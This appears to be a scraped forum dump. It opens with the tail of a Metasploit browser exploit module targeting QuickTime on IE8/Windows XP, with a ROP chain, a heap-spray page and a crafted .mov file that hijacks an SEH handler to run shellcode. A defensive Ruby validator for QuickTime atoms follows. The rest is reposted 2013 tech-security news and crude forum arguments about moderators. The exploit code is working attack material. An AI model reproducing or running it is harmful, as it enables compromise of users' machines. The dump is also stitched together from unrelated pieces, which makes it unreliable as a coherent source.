      0x77c3b860, # POP EAX # RETN [msvcrt.dll]
      0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
      0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
      0x77c35459  # ptr to 'push esp # ret ' [msvcrt.dll]
    ].pack("V*")
    p << rop
    p << "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
    p << payload.encoded
    p
  end

  def targetable?(agent)
    if agent =~ /MSIE 8\.0/ and agent =~ /Windows NT 5\.1/
      return true
    elsif agent =~ /contype/ # contype: a mov file request from Apple Quicktime
      return true
    end
    false
  end

  def get_html(t)
    js_p = ::Rex::Text.to_unescape(get_payload(t), ::Rex::Arch.endian(t.arch))
    fake_mov_name = rand_text_alpha(4) + ".mov"
    html = %Q|
		<html>
		<head>
		<script>
		#{js_property_spray}
		var s = unescape("#{js_p}");
		sprayHeap({shellcode:s});
		</script>
		</head>
		<body>
		<embed src="#{get_resource}/#{fake_mov_name}" width="0" height="0"></embed>
		</body>
		</html>
    |
    html.gsub(/^\t\t/, '')
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    print_status("Requesting: #{request.uri}")
    unless targetable?(agent)
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end
    print_status("Target selected as: #{target.name}") if target
    if request.uri =~ /\.mov$/
      print_status("Sending specially crafted .mov file")
      send_response(cli, @exploit, { 'Content-Type' => 'application/octet-stream' })
    else
      html = get_html(target)
      send_response(cli, html, { 'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache' })
    end
  end

  def sort_bytes(data)
    data.map { |e| [e].pack('N').scan(/../).reverse.join }.join
  end

  def rop_nop(t)
    [t['Nop']].pack('V*') # Ret (QuickTime.qts)
  end

  def exploit
    buf = ''
    buf << rand_text_alpha(467) # 467 to align the pivot
    10.times { buf << rop_nop(target) }
    buf << [
      target['Pop'], # POP ESP; RET (QuickTime.qts)
      0x20302020     # Target value for ESP (our ROP payload)
    ].pack('V*')
    buf << rand_text_alpha(611 - buf.length) # Offset 611 to hit SE Handler
    buf << sort_bytes([target.ret])          # ADD ESP,280; RET (QuickTime.qts) - pivot
    buf << rand_text_alpha(658 - buf.length) # 658 bytes to pad up the mov file size

    # Quicktime File Format Specifications:
    # https://developer.apple.com/standards/qtff-2001.pdf
    mov = "\x00\x00\x06\xDF"  # File size
    mov << "moov"             # Movie atom
    mov << "\x00\x00\x06\xD7" # size (1751d)
    mov << "rmra"             # Reference Movie atom
    mov << "\x00\x00\x06\xCF" # size (1743d)
    mov << "rmda"             # rmda atom
    mov << "\x00\x00\x06\xBF" # size (1727d)
    mov << "rdrf"             # Data reference atom
    mov << "\x00\x00\x00\x00" # size set to 0
    mov << "alis"             # Data reference type: FS alias record
    mov << "\x00\x00\x06\xAA" # Size (1706d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00\x06\x61" # Size (1633d)
    mov << rand_text_alpha(38)
    mov << "\x12"
    mov << rand_text_alpha(81)
    mov << "\xFF\xFF"
    mov << rand_text_alpha(18)
    mov << "\x00\x08"         # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x08"         # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x26"         # Size (38d)
    mov << rand_text_alpha(38)
    mov << "\x00\x0F\x00\x0E"
    mov << "AA"               # Size (must be invalid)
    mov << rand_text_alpha(12)
    mov << "\x00\x12\x00\x21"
    mov << rand_text_alpha(36)
    mov << "\x00"
    mov << "\x0F\x33"
    mov << rand_text_alpha(17)
    mov << "\x02\xF4"         # Size (756h)
    mov << rand_text_alpha(756)
    mov << "\xFF\xFF\x00\x00\x00"
    mov << buf
    @exploit = mov
    super
  end
end
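As an added, defensive example (not part of the module above and not Metasploit code): a Ruby walker over the QuickTime atom tree that checks every atom's declared length against the bytes its container actually holds. That is the inconsistency the crafted .mov above depends on, namely a nested rdrf atom with size 0 followed by length fields that do not match the data present, and it is the check a mail gateway or download filter can run before a file ever reaches a media player. Only the 8-byte size/type header layout comes from the QuickTime file format specification linked in the module; the container list, the atom() helper and the three sample files are constructed for this example.

```ruby
# Added example, not part of the Metasploit module above: a defensive walk of
# the QuickTime atom tree that reports size fields inconsistent with the file.
# Atom header per the QuickTime File Format spec: 32-bit big-endian size
# (including the header) followed by a 4-character type. Size 0 means "to end
# of file" and is only legal at top level; size 1 means a 64-bit size follows.

# Atom types treated as containers whose children are walked recursively
# (constructed list for this example; it covers the rmra/rmda nesting above).
CONTAINER_ATOMS = %w[moov rmra rmda trak mdia minf stbl].freeze

# Helper used only to build the constructed sample files below.
def atom(type, payload)
  [payload.bytesize + 8].pack('N') + type.b + payload.b
end

# Printable label for an atom type, safe even when the bytes are not ASCII.
def type_label(type)
  type.bytes.map { |b| (32..126).cover?(b) ? b.chr : '?' }.join
end

# Walks data[offset...limit] and appends one string per structural problem.
# Descent stops at the first problem inside a container, because later
# offsets can no longer be trusted once a length field is wrong.
def walk_atoms(data, offset = 0, limit = data.bytesize, top_level = true, path = '', findings = [])
  while offset < limit
    if limit - offset < 8
      findings << "#{path}: #{limit - offset} trailing bytes, too short for an atom header"
      break
    end
    size, type = data.byteslice(offset, 8).unpack('Na4')
    name = "#{path}/#{type_label(type)}"
    header = 8
    if size == 0
      unless top_level
        findings << "#{name}: size 0 (extends to EOF) inside a container"
        break
      end
      size = limit - offset
    elsif size == 1
      if limit - offset < 16
        findings << "#{name}: extended size header truncated"
        break
      end
      size = data.byteslice(offset + 8, 8).unpack1('Q>') # 64-bit big-endian
      header = 16
    end
    if size < header
      findings << "#{name}: declared size #{size} is smaller than its #{header}-byte header"
      break
    end
    if offset + size > limit
      findings << "#{name}: declared size #{size} overruns its container by #{offset + size - limit} bytes"
      break
    end
    if CONTAINER_ATOMS.include?(type)
      walk_atoms(data, offset + header, offset + size, false, name, findings)
    end
    offset += size
  end
  findings
end

def well_formed?(data)
  walk_atoms(data).empty?
end

# Constructed sample 1: a consistent reference-movie skeleton (moov/rmra/rmda/rdrf).
RDRF_BODY = "\x00\x00\x00\x00alis".b + ('A' * 16).b # flags, reference type, dummy alias data
GOOD_MOV = atom('moov', atom('rmra', atom('rmda', atom('rdrf', RDRF_BODY))))

# Constructed sample 2: the same skeleton, but the nested rdrf header claims size 0.
ZERO_SIZE_MOV = atom('moov', atom('rmra', atom('rmda', [0].pack('N') + 'rdrf'.b + RDRF_BODY)))

# Constructed sample 3: an rmda atom whose declared size exceeds the bytes present.
OVERRUN_MOV = atom('moov', atom('rmra', [200].pack('N') + 'rmda'.b + ('B' * 20).b))

if __FILE__ == $PROGRAM_NAME
  { 'good' => GOOD_MOV, 'zero-size' => ZERO_SIZE_MOV, 'overrun' => OVERRUN_MOV }.each do |label, mov|
    findings = walk_atoms(mov)
    puts "#{label}: #{findings.empty? ? 'well-formed' : findings.join('; ')}"
  end
end
```

A filter would call well_formed? on the body of any file whose magic or extension says QuickTime and quarantine on false; walk_atoms gives the path of the offending atom for the alert. The walker deliberately does not try to repair or skip past a bad length, since the point of the check is that no downstream parser should be asked to trust those bytes.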
  4. 6,000 systems shipped already. No pressure there then Several weeks ago, El Reg told you that Andy Monshaw, the long-time head of IBM's Storage Systems Division and more recently the general manager of the PureSystems modular systems business, had left Big Blue. Due to the Independence Day holiday in the United States, IBM was unable to confirm Monshaw's departure, but late last week Big Blue confirmed that Monshaw had indeed left the company and that a new executive had been tapped to replace him. The new general manager of the PureSystems product line is Andrew Sotiropoulos, who has been around many IBM divisions and groups over the years and who has deep experience with Chinese PC maker Lenovo Group. That connection may turn out to be more relevant than you think over the next six to nine months. Sotiropoulos does not yet have a full bio up on the IBM website, but the press relations team at IBM says that he spent 28 years with the company. Back in the early 2000s, he was in charge of the xSeries server business, the division of IBM that sold x86-based servers and today is called the System x product line. A few years later, Sotiropoulos moved to Australia and was put in charge of IBM's Asia/Pacific PC business. When IBM sold the PC business to Lenovo for $1.25bn at the end of 2004, Sotiropoulos was one of the 10,000 employees who made the leap from IBM to Lenovo, where he became general manager of Lenovo International and focused on selling the Chinese manufacturer's products outside of its home country, across the Asia/Pacific region. As best as we can piece together, Sotiropoulos rejoined IBM sometime in 2006 to run Big Blue's Integrated Technology Services division in Asia/Pacific. He was promoted to run all of the Global Technology Services business in the Asia/Pacific region in January 2009. 
Just in case you cannot keep it straight (heaven knows we can't), GTS is the part of the $60bn Global Services beast that does system outsourcing, so-called "integrated technology services" (which is not the same thing as systems integration), break-fix maintenance on hardware, and software support. The news of the new general manager for PureSystems comes as IBM completes its second quarter, and chief financial officer Mark Loughridge was boasting on a call last week that IBM had sold over 6,000 systems in the five quarters that the PureSystems modular machines have been available. Last November, IBM said that it had shipped PureSystems to more than 1,000 customers, and I guessed at the time that in the five months between the end of May 2012 when they started shipping and the middle of November when IBM was doing its stats, there could be anywhere from one to several thousand racks of Flex System iron across those customers. Some customers were starting with one chassis in a rack, some were buying multiple racks. By December 2012, IBM was saying it had shipped 2,300 PureSystems systems, and by systems it means full racks, says IBM PR, across all of the different variants: PureFlex, PureSystems, PureData, and PureApplication. In its first year, from the April 2012 launch to the April 2013 birthday, IBM said it shipped more than 4,000 systems (again, that is apparently a count of full racks of gear). So to add another 2,000 systems from the end of April to the end of June is a pretty good ramp. That is 1,000 racks per month for the past two months, compared to the average of around 285 racks per month for all of 2012 when the machines were actually shipping and 325 racks per month between January and April 2013, inclusive. Sales are accelerating for PureSystems, at least when measured by racks. The real question, though, is what were IBM's expectations, and did PureSystems meet them?
We'll find out if IBM ever does sell its System x business to Lenovo, and if the PureSystems machines are included. We can't imagine that IBM would sell the PureSystems line, but stranger things have happened. ® Source: TheRegister.co.uk
  5. It's the moment malware writers worldwide have been waiting ages for: millions of royal-watchers at home and at work will be in front of their computers, hunting for the first pictures of the soon-to-be-born third heir to the throne. The Duchess of Cambridge's labour has started, it was confirmed this morning. Any baby (whatever its sex) will be third in line to become Britain's king or queen following recent changes in UK law. And as with many a popular story - be it a natural disaster or celebrity death - malware-flingers have long been gestating plenty of scams and malware which they are more than ready to deliver. "Malware authors worldwide have been waiting ages for this," according to anti-malware veteran turned independent security blogger Graham Cluley. "Exclusive first pictures", "Secret video from inside delivery room" and "Sex revealed" images from the royal birth might become the theme of scams, according to Cluley. "I don't want to scaremonger, but it's easy to imagine," he said. The story of a royal birth will be so big that it's inevitable the bad guys will jump on the bandwagon, according to Cluley, who pointed out that malicious actors had previously menaced Wills and Kate. Cybercriminals were quick to exploit Kate and Wills' engagement. They were also quick to latch onto a story about a possible pregnant Kate Middleton doll in an attempt to entrap users in malware scams. High-profile news stories are often used to trick surfers into visiting scareware portals or exploit-ridden sites using search engine manipulation, or blackhat SEO tactics. But virus writers are unreliable types at the best of times, so scams do not always appear. Sean Sullivan, a security adviser at F-Secure, joked that scams might be more likely if Kate gives birth to twins. He said: "So, if it were twins, and a C-section, is it the doctor that decides the line of succession? Are there protocols?" Source: TheRegister.co.uk
  6. Hackers have developed a sophisticated StealRat botnet, capable of bypassing firms' advanced anti-spam defences, according to security firm Trend Micro. Trend Micro threat response engineer Jessa De La Torre reported uncovering the botnet, claiming that it uses advanced techniques to hide the malware used in the scam. "While exploiting vulnerable websites to send out spam has already been exhausted by other botnets, StealRat stood out because it used simple yet subtle methods to improve the botnet's resiliency," wrote De La Torre. "Its operators set very clear boundaries. They used compromised sites to send out spam. They also made use of compromised machines, but only as mediators between the compromised sites and the spam server." De La Torre said by removing the interaction between the spam message and the campaign's central server, the criminals are able to bypass most businesses' cyber defences. "In this setup, the actual spam server is hiding behind three layers of unsuspecting victims: two compromised websites and an infected machine. The infected machine acts as a liaison between the spam server and the compromised website," wrote De La Torre. "As there is no interaction between the spam and server, it will appear the email has originated from the infected machine. The spam mail itself does not spread the malware, so there is no visible link between the two as well. In essence, they have separated the core functions and minimised interactions among them to cut off any threads that could link them to each other." The tactic has reportedly proven effective, with Trend estimating the attackers are using 85,000 unique IP addresses or domains to send out spam to seven million chosen email addresses. Each IP is estimated to contain roughly two spamming scripts. StealRat's discovery comes during a wider evolution of cyber criminals' techniques.
Numerous security companies have warned that criminal and state-sponsored hackers are developing new defence-dodging tactics. Most recently security firm Context reported detecting a marked spike in the number of watering hole attacks targeting businesses with government contracts. Source: V3.co.uk
  7. UK PRIME MINISTER Dave Cameron is getting ready to announce a UK system for accessing adult content, an opt-in one that will probably be worse than no controls whatsoever. We had a whiff of this last week when ISPs were reacting to a letter from the government that asked them to kick in cash for craziness and consider making people think that the system would be default-on rather than an opt-in choice. The ISPs confirmed the letter and it was not well received, but the government decided to push on with its plans anyway. The Daily Mail crows about a "victory" over pornography, saying that the UK will close every internet user's access to adult content unless they choose to access it. Cameron was on the BBC's Andrew Marr show on Sunday when he spoke about his plans. He said that the internet is "corroding childhood" and needs controls, and of course he mentioned images of child abuse. "Just because it's the internet doesn't mean there shouldn't be laws and rules and responsible behaviour," he added. "We need to get the companies to do more too. There are some good things that they are doing... Some people are putting appalling terms in and they are getting results. We need to have strong talks with those companies." He said that if the government does not get what it needs it will consider legislation. "I want them to do more," he added. "It's about companies wanting to act responsibly. They [are] enabling it. There is a further step that is required." Cameron will give his full speech later. Source: TheInquirer.net
  8. SOFTWARE DEVELOPER Mozilla has announced that it will release updates to Firefox OS every three months, with security updates scheduled every six weeks. Mozilla's rapid release schedule has been in force for over two years with the outfit's web browser Firefox seeing releases every six weeks. Now Mozilla has announced that its Firefox OS will move to a similar release schedule, though security updates will be released every six weeks with new features released every three months. According to Mozilla's manager of Release Management Alex Keybl, Firefox OS 1.0 skipped two releases of the Gecko rendering engine that powers it. Keybl said the firm had to work with more than just consumers but also mobile phone OEMs, carriers and chip makers, suggesting that a freeze in the engine used in Firefox OS 1.0 was needed at least three months before the operating system was shipped. However Keybl said that Mozilla will now move back to its preferred rapid release schedule with Firefox OS. Mozilla won't, however, be releasing new features in Firefox OS every six weeks; instead that release schedule will contain security fixes, with new features coming every three months. Keybl said, "Now that we have our v1.0 behind us and we're moving forward with even more partners, we're going to do our best to bring Firefox OS back into our heartbeat and will make quarterly feature releases available to partners along with six-weekly security updates for the previous two feature releases." Mozilla's Firefox OS is pitched at low-end smartphones and has attracted attention from mobile operators that see it as a controllable alternative to Apple's iOS and Google's Android. With Mozilla's rapid development cycle iteration, it could be a boon for mobile operators looking to make even more money from smartphones in the future. Source: TheInquirer.net
  9. A group of MIT researchers has unveiled a machine learning approach to TCP congestion which could form the foundation of the next round of improvements to the venerable protocol's performance. Dubbed “Remy”, their TCP control software is based on the idea that even sophisticated modern congestion control algorithms (like Compound TCP in Windows or Cubic in Linux) aren't flexible enough to cope with increasingly complex networks. Instead, Professor Hari Balakrishnan, Fujitsu Professor of Electrical Engineering & Computer Science at MIT, believes it's better to set computers to the task of identifying what TCP settings work best under particular conditions. Their work, pre-publication version here, appears to show that by replacing manually-generated congestion control with Remy, networks could achieve far better performance than any of the current TCP congestion control algorithms. The idea is that a subnetwork that's got a high-capacity fibre on the other side of the router is going to have completely different congestion behaviours to one that's connected over a 3G wireless connection. For example, the naturally-higher latency of a wireless connection can look like congestion to an endpoint, because of its slow ACK times. The fundamental problem the MIT group is trying to solve: TCP has a limited network model. “For example,” they write, “because TCP assumes that packet losses are due to congestion and reduces its transmission rate in response, some subnetwork designers have worked hard to hide losses. This often simply adds intolerably long packet delays.” “We believe that the best way to approach this question is to take the design of specific algorithmic mechanisms out of the hands of human designers (no matter how sophisticated!), and make the end-to-end algorithm be a function of the desired overall behaviour,” they continue.
Describing TCP behaviour in terms of game theory, the MIT researchers write that the best thing any endpoint can do with a packet, at any given moment, is to send it – and if every endpoint simply hands its packet to the network, the network collapses into congestion. Remy is designed to work on a subnetwork basis – that is, all endpoints in a subnet are running Remy. Hence, for example, on a home network, Remy's aim would be to limit local congestion by having the hosts respond in the same way to that congestion. To do this, Remy expresses the sender's state as a function of the arrival time of acknowledgements from the far end (using an exponentially weighted moving average, EWMA); the timestamps on those acks (also weighted as EWMA); and the ratio between the most recent packet RTT and the minimum RTT seen in a session. The system then builds a table of rules for its subnetwork, iteratively adjusting congestion behaviours until a best-case is reached under given conditions. Source: TheRegister.co.uk
  10. Most enterprise networks are riddled with vulnerable Java installations, according to a new study whose release coincides with the discovery of another 0-day Java flaw. Less than one per cent of organisations are running the latest version of Java, according to a study by security software firm Bit9. The most frequently encountered version of Java running on endpoints is version 6 update 20, found on 9 per cent of systems and subject to 96 high-severity vulnerabilities. The average enterprise has more than 50 versions of Java installed across its PCs and servers, while five per cent of those enterprises have more than 100 versions of Java installed. This creates a smorgasbord of mouldy vulnerabilities for hackers to feast upon. At least part of the reason for this sorry state of affairs is that the Java installation and update process often does not remove older versions of the widely used technology. Most endpoints have multiple versions of Java installed, which means hackers can fairly easily determine what versions of Java an enterprise is running before targeting the oldest, most vulnerable versions. Eighty-two per cent of the endpoints analysed by Bit9 were running the version 6 series of Java, which has the most known vulnerabilities of any version of Java. All these factors make Java a hacker and cyberspy favourite or the "endpoint technology most targeted by cyber attacks," as Bit9 puts it. Bit9's study, put together in a report entitled Java Vulnerabilities: Write Once, Pwn Anywhere, is based on an analysis of Java deployment statistics on approximately 1 million endpoints at hundreds of enterprises worldwide. Oracle only recently revamped the Java update process so that older versions were purged. But these changes have done nothing by themselves to address legacy or orphaned Java installations, some of which date back to the dawn of personal computing, according to Bit9.
In trying to minimise compatibility problems, a legacy of insecurity has been created. “For the past 15 years or so, IT administrators have been under the misconception that updating Java would address its security issues,” explained Harry Sverdlove, Bit9's chief technology officer. “They have been told that to improve security, they should continuously and aggressively deploy Java updates on all of their endpoints. Unfortunately, updating is not the same as upgrading. "Until very recently, those updates have failed to deliver the promised security upgrade because they have not removed older, highly vulnerable versions of Java they were intended to replace. As a result, most organisations have multiple versions of Java on their endpoints, including some that were released at the same time as Windows 95,” he added. Sorting out the mess involves picking up the cyber-security equivalent of an emergency audit. Enterprises should first evaluate how many versions of Java are running before deciding whether these older versions are needed for valid business reasons and, in particular, whether Java should be running in browsers. Several security firms routinely advise consumers and businesses to disable Java browser add-ons, which are seldom needed to surf the 'net but sometimes needed for internet applications. Users can then use security technologies from the likes of Bit9 and others to enforce these policy decisions. A video featuring Bit9 CTO Harry Sverdlove discussing the Java problem can be found here. Groundhog 0-day. Separately, Poland-based security research outfit Security Explorations claims to have unearthed a flaw that bypasses the security sandbox on Java 7, exposing host systems to malicious attacks. Adam Gowdiak, chief exec and founder of Security Explorations, explained the flaw in a post on the Full Disclosure mailing list.
Security Explorations has created proof-of-concept (PoC) exploit code that does the business against Java SE 7 Update 25 and earlier. The vulnerability arises because of flaws in the Reflection API (application programming interface), a technology that debuted in Java 7 SE and which has been the font of earlier security problems involving the latest version of the frequently abused software technology. The upshot is that the latest version of Java can be attacked by types of attack that are more than 10 years old, according to Gowdiak, who slammed Oracle for permitting a through-route to such a well-known attack, which he argues should have been straightforward to defend against. "If Oracle had any Software Security Assurance procedures adopted for Java SE, most of simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect." Gowdiak's find means the Java zero-day counter was reset on Thursday, yet again. Oracle is yet to respond to Gowdiak's discovery, so it's unclear if and when a fix might become available. The security giant last released a batch of Java updates in June (details here) and the next scheduled update is not due until October. Source: TheRegister.co.uk
  11. Dozens of tech players and other organizations have asked Washington to allow them to reveal more information about the requests for user data. The tech industry wants to come clean -- or at least cleaner -- about its role in providing user data to the government and is asking the feds for permission to do so. In a letter sent Thursday to the White House and Congress, dozens of organizations involved in or concerned about the National Security Agency data-snooping controversy made their requests, Reuters reported. Companies want to be able to regularly provide statistics on the number and scope of user data records ordered by the government. They also want to be allowed to disclose the number of people, accounts, or devices targeted in those requests. On Wednesday, AllThingsD obtained a copy of the letter with the request: Apple, Google, and Facebook are among the tech players that signed the letter. Other organizations that have joined the effort include Human Rights Watch, Electronic Frontier Foundation, American Civil Liberties Union, Americans for Tax Reform, and FreedomWorks. The government, at least as voiced by NSA head Keith Alexander, seems open to the idea as long as it doesn't jeopardize investigations, Reuters added. Alexander also stressed that the companies had no choice in handing over user data to the government as they were compelled by court order to do so. As such, the companies want to offer more specifics on the type of data they were forced to provide. Source: News.Cnet.com
  12. Vulnerability in the security key that protects the card could allow eavesdropping on phone conversations, fraudulent purchases, or impersonation of the handset's owner, a security researcher warns. A vulnerability on SIM cards used in some mobile phones could allow malware infection and surveillance, a security researcher warns. Karsten Nohl, founder of Security Research Labs in Berlin, told The New York Times that he has identified a flaw in SIM encryption technology that could allow an attacker to obtain a SIM card's digital key, the 56-digit sequence that allows modification of the card. The flaw, which may affect as many as 750 million mobile phones, could allow eavesdropping on phone conversations, fraudulent purchases, or impersonation of the handset's owner, Nohl warned. "We can remotely install software on a handset that operates completely independently from your phone," warned Nohl, who said he managed the entire operation in less than two minutes using a standard PC. "We can spy on you. We know your encryption keys for calls. We can read your SMSs. More than just spying, we can steal data from the SIM card, your mobile identity, and charge to your account." The vulnerability was found in the Digital Encryption Standard, a cryptographic method developed by IBM in the 1970s that is used on about 3 billion cell phones every day. While the encryption method has been beefed up in the past decade, many handsets still use the older standard. Tests showed that 1,000 cards in Europe and North America exhibited signs of the flaw. Nohl, who plans to detail the flaw at the Black Hat security conference in Las Vegas next month, said he has already shared the results of his two-year study with the GSM Association, a trade group representing the cell phone industry. GSM Association spokeswoman Claire Cranton told the Times that her organization had already passed the results on to members of its group that still rely on the older standard.
"We have been able to consider the implications and provide guidance to those network operators and SIM vendors that may be impacted," Cranton said in a statement. Nohl, who has a doctorate in computer engineering from the University of Virginia, made headlines in 2008 by publicizing weaknesses in wireless smart card chips used in transit systems around the globe. A year later, he cracked the algorithm used on GSM (Global System for Mobile Communications) cell phones, which is designed to prevent attackers from eavesdropping on calls. Source: News.Cnet.com
  13. You want to show you have clean hands? Here's USA PRISM Plus, an app that takes random shots of your phone and sends them to the NSA careers Twitter account. It may well be that the NSA is recording every breath you take, every move you make. But it's going to take them quite some time to review whether your breaths and moves are, in some way, significant or even troubling. So along comes an Android app that can help you by forewarning the NSA with "Look! It wasn't me!" I am grateful to Android Central for forewarning me about USA PRISM Plus. Being an Android app, this sprightly invention relies on utter openness. For it takes random shots of your cell phone and sends them to the NSA Careers Twitter account. You can decide how often you wish yourself to be exposed. Some might consider this trollish behavior -- though, for myself, I'm not sure whether the word "troll" has any consistent meaning. There's a certain charm in that the app's tweets are accompanied by the words "random security check." But one wonders what sanctions the NSA might take against those who clutter its Twitter with their titters? Moreover, what if you just happen to sext your dearest lover just at the moment that your USA PRISM Plus decides to take a screenshot? What if this sext is sent to the NSA? At a minimum, this would ruin your career chances. It's as well, though, to voice some concerns about the NSA Careers Twitter account too. It follows only seven Twitter accounts. Three belong to Mashable. Who will be the first to suggest some level of collaboration going on here? Source: News.Cnet.com
  14. Apple says its developer site was targeted in an attack, and that any information that was taken was encrypted. The site remains down. Apple's site for developers was attacked by an intruder last week, the company said Sunday. In a note to developers, the company said that an "intruder" tried to gain access to developer information, prompting the company to take the service down. Sensitive information on that site was encrypted, Apple said; however, it's keeping the site down while security is being hardened. No estimate was provided for when it will be back up. Apple sent the following to developers on Sunday, detailing some of what happened: An Apple spokesman told CNET that the company's developer Web site is "not associated with any customer information" and that "customer information is securely encrypted." Apple's developer site is home to software downloads, documentation and forums for third-party software developers. The site became inaccessible to registered developers last Thursday, causing angst for users who could not access those features. On Friday the company noted that it would be extending membership periods to cover the outage, and that any published software would not be removed. The attack comes as Apple's gearing up for two new major releases of iOS and OS X. Developers have been readying their software for the new versions of those operating systems in time for their official release, which Apple has said will come in the fall. The outage sparked some concerns about there being a larger, behind-the-scenes security issue. Those concerns, which turned out to be well-founded, were amplified by scattered reports from users saying they had received password reset e-mails, suggesting others were attempting to gain access to their Apple ID accounts. Source: News.cnet.com
  15. Between 28 and 30 August, the 3rd edition of the annual non-profit unconference on Agile, Lean and Software Craftsmanship will take place in Bucharest at the Radisson Blu Hotel. The Agile Lean Europe Unconference (ALE Unconference) will include keynotes, invited speakers, talks selected by the community and free discussions on topics proposed by the audience during the open space sessions. There will also be World Cafes, a Gaming Lounge and many social activities during the day and in the evening. One keynote each day. The topics covered range from new types of organizations and organizational cultures to advanced techniques and implementation aspects of agile in IT and beyond. Jurgen Appelo is scheduled on the first day, Liz Keogh on the second day, and Joe Justice will give the closing keynote of the event. Surprises in the program. The event will also include a mix of talks on agile practices, psychology, sociology, project management, programming and other surprises. Retrospectives, coaching for agile teams, learning, innovation and continuous improvement are just a few of the topics related to agile practices. The psychology debates will cover subjects such as the power of cognition, the difference in perspective generated by one's role and position in the organization, and even neuroscience. Then there will be presentations on the sociology of organizational culture, professional engagement, creating your own options and culture hacking. On the project management side, the speakers will touch on estimation, creating projects without estimates, offers and pricing. Programmers will learn about unit testing, legacy code, incremental design and more. Open Space. Half of the program will be Open Space. What is Open Space? The best moment to talk about interesting new and old ideas regarding agile, lean and software craftsmanship.
The program is created on the spot by the participants, with topics of interest to them. The only thing they have to do is stick their discussion ideas on the wall called the "Market Place". These ideas are later promoted through tweets, blog posts, articles or even crazier means, and the participants select from the "Market Place" the ideas of interest to them, that is, the sessions they want to attend. A bit of history. In 2011, a few passionate people decided to create a network of Agile and Lean professionals, because there were many professionals innovating and creating interesting things in their own countries, but they were not connected. The initial group met in 2011 at the XP conference in Madrid and decided to create an annual conference. This event proved to be a success, its novelty being the absence of the restrictions of traditional conferences. Everyone could contribute an idea and, in an agile way, it was integrated into the concept of the event. This is how the Agile Lean Europe Unconference was created. Half of the event is Open Space, where the program emerges from the ideas and energy of the participants. The Open Space concept was initiated in 1980 by Harrison Owen, who decided to no longer have a predefined agenda for conferences and instead invited people to an event where the participants created the program on the spot. The first edition of the conference, ALE 2011, was organized not by a Conference Board, as was traditionally done, but by several Conference Sofas, which anyone who wanted to contribute could join. Each sofa was responsible for a particular area of organization: Accounting, Marketing, Spouse & Kids, etc.
Agile software development is a family of project management methodologies in software engineering, based on incremental development, which embraces and promotes the changes that evolve throughout the entire life cycle of a project. These methodologies are characterized by dividing the problem into small sub-problems and planning them over short periods. Detailed long-term planning is avoided, because frequent delays inherently appear in software development due to changes in and refinement of the client's requirements. The main goal is that at the end of each development cycle, called an iteration, which usually lasts a few weeks, there is a working version of the software being developed. Join our family! Every member of the European Agile and Lean communities feels part of a family. This is why this year's organizers continue the tradition of inviting participants to bring their families along with them, to enjoy the special program for partners and children (Spouse & Kids). The Agile and Lean family invites all practitioners, theoreticians and beginners to join the ALE network and the ALE Unconference, because we want to become better together through the exchange of information and experiences, as the ALE motto says: Because we share. About Mosaic Works. Event link: ALE 2013 | The Agile Lean Europe 2013 conference in Bucharest. Program link: ALE2013 Program | ALE 2013. References: Manifesto for Agile Software Development; Manifestul Agile. Source: Press releases
  16. Congratulations, and many more to come.
  17. He said it clearly: if there are complaints about the moderators, tell him right away. I have nothing personal against any of them. All I criticise is the attitude some of them have. Honestly, in the year I've been watching the forum closely from the shadows, I haven't seen a moderator come and create something for the community. Apart from M2G and wildchild, whom you still see on the forum, I don't know what the rest do. It's okay, I understand they have a life and a lot of knowledge, but put your knowledge here. Posting once a week is fine. They became moderators for the knowledge they acquire, and they probably did something for this community some time ago. But lately, nothing. Believe me, I don't enjoy hanging around here cursing everyone and talking ugly either. Sometimes I may even get wrong the person I'm cursing. On top of that, I understand that this is RST, the place where nobody is a saint and a more "open" vocabulary is allowed. I'd like to find someone who posts something for the sake of it, and to sit and learn from what he posts. Honestly, I'd like that.
  18. Well, what would you want him to do? We all know there's no way to remove the stupidity from the forum. As soon as a crap post like "ISECENTER floods your mother" gets posted, it should be deleted and banned the next second. That's what moderators are for. Moderators who lately have done next to nothing. I'll give you an example, The.Legend: https://rstforums.com/forum/72501-hackerii-de-pe-isecenter-da-cu-fludul-rst.rst My second post was "Luceafarul". As you can see, that topic gathered 43 crap posts, insults etc. / 5 pages / 1300 views. Mr MrRip, who is a moderator, came into the thread and what did he do? He gave me a warning and edited my post. NOBODY, but NOBODY else in that topic got anything, even though if you read it you'll find what we all know: insults / off-topic flame / personal attacks. All of them break the rules. What is Nytro supposed to do in this situation? That's why there are 10 moderators, to do their job. But what can you do if, out of those 10, MrRip has 3 posts in 2013 and comes and gives a crap warning? My opinion is that Nytro does quite a lot for this community. You can say what you want, but he deserves much more respect. Look at his post count and then at the posts he makes; see the quality.
  19. Well, what do you want from the forum owner, man? The forum owner keeps RST up after it was shut down because of some shits. Does the owner stop you from doing something for this community? Let's stay on topic, though..
  20. Jerking off isn't a vocation? Here, take these: https://rstforums.com/forum/7197-hackerul-de-romania.rst https://rstforums.com/forum/16359-sfaturi-de-om-batran-pentru-ai-nostri-hackeri-tineri.rst
  21. bodostyle: I disagree. As for change, a lot can be changed. It only takes one person for a change to happen and to give birth to "something new". It's all about knowledge, motivation and inspiration.
  22. Gigi Becali has had a mental breakdown: he has been talking for two hours in front of a surveillance camera! - www.audvoci.ro
  23. You can give it all to me, why bother?
  24. I'm not on any staff.